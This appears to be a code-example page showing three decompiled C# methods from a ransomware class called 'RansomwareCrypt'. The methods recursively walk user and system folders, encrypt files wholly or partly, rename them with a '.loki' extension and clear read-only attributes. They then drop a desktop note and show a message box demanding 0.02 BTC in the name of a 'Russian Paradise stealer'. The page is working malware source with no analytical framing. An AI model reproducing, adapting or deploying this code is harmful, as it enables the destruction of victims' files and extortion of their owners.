Ejemplo n.º 1
0
 // Token: 0x06000192 RID: 402 RVA: 0x0000B804 File Offset: 0x00009A04
 internal static void Start()
 {
     if (!File.Exists(Environment.GetEnvironmentVariable("ProgramData") + "\\trig"))
     {
         string[] array = new string[]
         {
             Environment.GetFolderPath(Environment.SpecialFolder.Recent),
             Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
             Environment.GetFolderPath(Environment.SpecialFolder.MyPictures),
             Environment.GetFolderPath(Environment.SpecialFolder.MyMusic),
             Environment.GetFolderPath(Environment.SpecialFolder.MyVideos),
             Environment.GetFolderPath(Environment.SpecialFolder.Personal),
             Environment.GetFolderPath(Environment.SpecialFolder.Favorites),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonPictures),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory),
             Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory),
             Environment.GetFolderPath(Environment.SpecialFolder.Personal),
             Environment.GetFolderPath(Environment.SpecialFolder.UserProfile),
             Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData),
             Environment.GetFolderPath(Environment.SpecialFolder.ProgramFilesX86),
             Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)
         };
         for (int i = 0; i < array.Length; i++)
         {
             RansomwareCrypt.GetFile(array[i]);
         }
     }
     File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt", string.Concat(new string[]
     {
         "IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer:",
         crypt.AESDecript(Settings.Stealer_version),
         "\nTo Decrypt: \n - Send 0.02 BTC to: ",
         Settings.bitcoin_keshel,
         "\n- Follow All Steps"
     }), Encoding.UTF8);
     Thread.Sleep(2000);
     MessageBox.Show(string.Concat(new string[]
     {
         "IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer: ",
         Settings.Stealer_version,
         "\nTo Decrypt: \n - Send 0.02 BTC to: ",
         Settings.bitcoin_keshel,
         "\n - Follow All Steps"
     }));
     Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt");
 }
Ejemplo n.º 2
0
 // Token: 0x06000191 RID: 401 RVA: 0x0000B794 File Offset: 0x00009994
 public static void GetFile(string string_1)
 {
     try
     {
         foreach (string text in Directory.GetFiles(string_1))
         {
             if (!Path.GetExtension(text).Contains("loki"))
             {
                 RansomwareCrypt.EncryptFiles(text);
             }
         }
         string[] array = Directory.GetDirectories(string_1);
         for (int i = 0; i < array.Length; i++)
         {
             RansomwareCrypt.GetFile(array[i]);
         }
     }
     catch (Exception)
     {
     }
 }
Ejemplo n.º 3
0
 // Token: 0x0600018F RID: 399 RVA: 0x0000B534 File Offset: 0x00009734
 public static void EncryptFiles(string string_1)
 {
     try
     {
         try
         {
             if (new FileInfo(string_1).Length > 4096L)
             {
                 if (new FileInfo(string_1).Length <= 30000000L)
                 {
                     byte[] array = new byte[8192];
                     using (BinaryReader binaryReader = new BinaryReader(File.Open(string_1, FileMode.Open)))
                     {
                         byte[] array2 = RansomwareCrypt.RidjinEncrypt(binaryReader.ReadBytes(4096));
                         Array.Copy(array2, array, array2.Length);
                     }
                     using (BinaryWriter binaryWriter = new BinaryWriter(File.Open(string_1, FileMode.Open)))
                     {
                         binaryWriter.Write(array);
                     }
                     File.Move(string_1, string_1 + ".loki");
                 }
             }
             else
             {
                 byte[] bytes = RansomwareCrypt.RidjinEncrypt(File.ReadAllBytes(string_1));
                 File.WriteAllBytes(string_1, bytes);
                 File.Move(string_1, string_1 + ".loki");
             }
         }
         catch (Exception)
         {
             FileAttributes fileAttributes = File.GetAttributes(string_1);
             if ((fileAttributes & FileAttributes.ReadOnly) == FileAttributes.ReadOnly)
             {
                 fileAttributes = RansomwareCrypt.FileAttrib(fileAttributes, FileAttributes.ReadOnly);
                 File.SetAttributes(string_1, fileAttributes);
             }
             if (new FileInfo(string_1).Length <= 4096L)
             {
                 byte[] bytes2 = RansomwareCrypt.RidjinEncrypt(File.ReadAllBytes(string_1));
                 File.WriteAllBytes(string_1, bytes2);
                 File.Move(string_1, string_1 + ".loki");
             }
             else if (new FileInfo(string_1).Length <= 30000000L)
             {
                 byte[] buffer = new byte[8192];
                 using (BinaryReader binaryReader2 = new BinaryReader(File.Open(string_1, FileMode.Open)))
                 {
                     buffer = RansomwareCrypt.RidjinEncrypt(binaryReader2.ReadBytes(4096));
                 }
                 using (BinaryWriter binaryWriter2 = new BinaryWriter(File.Open(string_1, FileMode.Open)))
                 {
                     binaryWriter2.Write(buffer);
                 }
                 File.Move(string_1, string_1 + ".loki");
             }
         }
     }
     catch (Exception)
     {
     }
 }